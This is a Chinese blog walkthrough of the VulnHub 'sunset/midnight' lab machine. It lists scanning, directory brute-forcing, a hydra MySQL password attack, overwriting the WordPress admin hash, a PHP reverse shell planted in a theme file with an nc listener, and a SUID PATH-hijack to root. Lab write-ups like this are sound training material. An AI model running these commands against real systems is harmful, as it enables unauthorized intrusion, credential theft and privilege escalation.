vulnhub之sunset/midnight的实践

admin 2024年11月27日13:33:23评论5 views字数 1401阅读4分40秒阅读模式

今天实践的是vulnhub的sunset/midnight镜像,

下载地址,https://download.vulnhub.com/sunset/midnight.7z,

先是用workstation导入,做地址扫描没扫到地址,

于是又用virtualbox导入,重新做地址扫描,

sudo netdiscover -r 192.168.0.0/24,这回有地址了,195就是,

vulnhub之sunset/midnight的实践

再继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.195,

vulnhub之sunset/midnight的实践

有web服务,浏览器访问http://192.168.0.195,转到了域名访问,

vulnhub之sunset/midnight的实践

把域名和IP添加到hosts文件,再次浏览器访问http://sunset-midnight,

vulnhub之sunset/midnight的实践

做一下目录暴破,dirb http://sunset-midnight,发现了后台url,

vulnhub之sunset/midnight的实践

浏览器访问http://sunset-midnight/login,需要用户名密码,

vulnhub之sunset/midnight的实践

之前端口扫描的时候还看到有mysql服务,可以做个root账户的密码暴破,

hydra -l root -P /usr/share/wordlists/rockyou.txt sunset-midnight mysql -t 4,获取到root/robert,

vulnhub之sunset/midnight的实践

访问mysql服务,mysql -h sunset-midnight -u root -probert,

vulnhub之sunset/midnight的实践

查看到了后台管理员的账号密码,密码是md5的,

vulnhub之sunset/midnight的实践

自己造一个密码,123456,在线转成md5的,

vulnhub之sunset/midnight的实践

更新后台管理员的密码,update wp_users set user_pass='e10adc3949ba59abbe56e057f20f883e' where id=1;

vulnhub之sunset/midnight的实践

用admin/123456登录后台管理url,

vulnhub之sunset/midnight的实践

根据以往经验,找到可以上传反弹shell内容的页面,

把kali攻击机上/usr/share/webshells/php/php-reverse-shell.php的内容贴上,并修改好kali攻击机的地址和端口,保存成功,

vulnhub之sunset/midnight的实践

kali攻击机这边开个反弹shell监听,nc -lvp 4444,

浏览器访问http://sunset-midnight/wp-content/themes/twentynineteen/404.php,反弹shell这就过来了,不是root权限,需要提权,

转成交互式shell,python3 -c "import pty;pty.spawn('/bin/bash')",

vulnhub之sunset/midnight的实践

从/var/www/html/wordpress/wp-config.php中查看到用户名密码,

jose/645dc5a8871d2a4269d4cbe23f6ae103,

vulnhub之sunset/midnight的实践

切到jose,查找root权限执行的程序,find / -perm -u=s 2>/dev/null,

status程序中搜索service命令,strings /usr/bin/status | grep service,

做个新的环境变量路径,export PATH=/tmp/:$PATH,造个新的service,

cd /tmp,echo "/bin/sh" > service,给可执行权限,chmod +x service,

执行status程序,/usr/bin/status,获取到新的shell,id确认是root,

vulnhub之sunset/midnight的实践

原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之sunset/midnight的实践

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月27日13:33:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之sunset/midnight的实践https://cn-sec.com/archives/1631897.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息